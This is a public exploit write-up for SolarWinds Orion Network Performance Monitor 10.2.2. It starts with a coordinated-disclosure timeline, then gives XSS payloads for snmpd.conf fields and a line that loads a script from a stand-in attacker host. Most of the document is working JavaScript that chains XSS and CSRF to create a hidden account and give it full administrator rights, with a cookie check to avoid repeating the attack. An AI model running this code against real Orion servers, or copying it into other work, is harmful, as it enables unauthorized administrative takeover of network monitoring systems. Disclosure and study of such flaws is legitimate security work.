/*
######################################################################################
# Exploit Title: SolarWinds Orion Network Performance Monitor 10.2.2 Multiple Vulnerabilities
# Date: Jul 21 2012
# Author: muts
# Version: SolarWinds Orion Network Performance Monitor 10.2.2
# Vendor URL: http://www.solarwinds.com/
######################################################################################
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
02 Jul 2012: Contact received from SolarWinds with vulnerability confirmation and plans for remediation
09 Jul 2012: SolarWinds provides a preview release (10.3.1) for testing
10 Jul 2012: Advised SolarWinds that the preview release fixed the reported vulnerabilities
21 Jul 2012: Public disclosure
Vulnerability Details:
SolarWinds Orion Network Performance Monitor (NPM) is vulnerable to persistent XSS when scanning a remote system containing malicious JavaScript in its snmpd.conf file. The vulnerable fields were determined to be:
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName <script>alert('name')</script>
In addition, NPM is also vulnerable to CSRF attacks despite the fact that it makes use of VIEWSTATE protection.
Through a combination of XSS and CSRF, a user can be added to the web application by configuring the snmpd.conf file to point to an attacker-controlled JavaScript file:
syscontact <script src="http://attacker/evil.js"></script>
*/
function getCookie(c_name)
{
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==c_name)
{
return unescape(y);
}
}
}
function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}
function postCredentials(viewState, user, password)
{
var http = new XMLHttpRequest();
var url = "/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion";
var params = "ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1" + "&" +
"__EVENTTARGET" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1" + "&" +
"__EVENTARGUMENT" + "=" + "&" +
"__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName" + "=" + user + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password" + "=" + password + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword" + "=" + password + "&" +
"__ASYNCPOST" + "=" + "false"
http.open("POST", url, false);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection", "close");
http.send(params);
var response = http.responseText;
var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = response;
return(doc);
}
function setAdminPriv(viewState, username)
{
var http = new XMLHttpRequest();
var url = "/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username + "&AccountType=Edit";
var params = "__EVENTTARGET" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24submitButton" + "&" +
"__EVENTARGUMENT" + "=" + "&" +
"__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24checkboxesVisible" + "=" + "hidden" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAccountEnabled%24listBox" + "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24txtAccountExpires" + "=" + "Never" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynDisableSessionTimeout%24listBox" + "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAdminRights%24listBox" + "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAllowNodeManagement%24listBox" + "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynCustomizeViews%24listBox" + "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynClearEvents%24listBox" + "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynBrowserIntegration%24listBox" + "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxAlertSound" + "=" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tbBreadcrumbItems" + "=" + "50" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl00%241%24menuBars" + "=" + "Default" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl01%243%24menuBars" + "=" + "Network_TabMenu" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl02%242%24menuBars" + "=" + "Virtualization_TabMenu" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxHomePageView" + "=" + "1" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxSummaryView" + "=" + "1" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxReportFolder" + "=" + "%5CReports" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxNodeDetails" + "=" + "-1" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVolumeDetails" + "=" + "3" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxNodeDetails" + "=" + "7" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxInterfaceDetails" + "=" + "14" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVSANDetails" + "=" + "22" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxUCSChassisDetails" + "=" + "24" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "9" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "10" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "11"
http.open("POST", url, false);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection", "close");
http.send(params);
var response = http.responseText;
var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = response;
return(doc);
}
function getHtmlBody(url, ref)
{
var xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET', url, false);
xmlHttp.send(null);
var results = xmlHttp.responseText;
var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = results;
return(doc);
}
function getViewState(doc)
{
return(doc.getElementById("__VIEWSTATE"));
}
var username = "myuser";
var password = "test";
// Check if we already attacked the host to avoid duplicated attacks
if (getCookie("o1") == null)
{
// Get the initial view-state
var doc1 = getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion");
// Create a new account with the given credentials
postCredentials(getViewState(doc1).value, username, password);
// Get the edit account view-state
var doc2 = getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username + "&AccountType=Edit");
// Assign our new account with administrative privileges
setAdminPriv(getViewState(doc2).value, username);
// Set the cookie to avoid duplicated attacks
setCookie("o1", 1, "");
}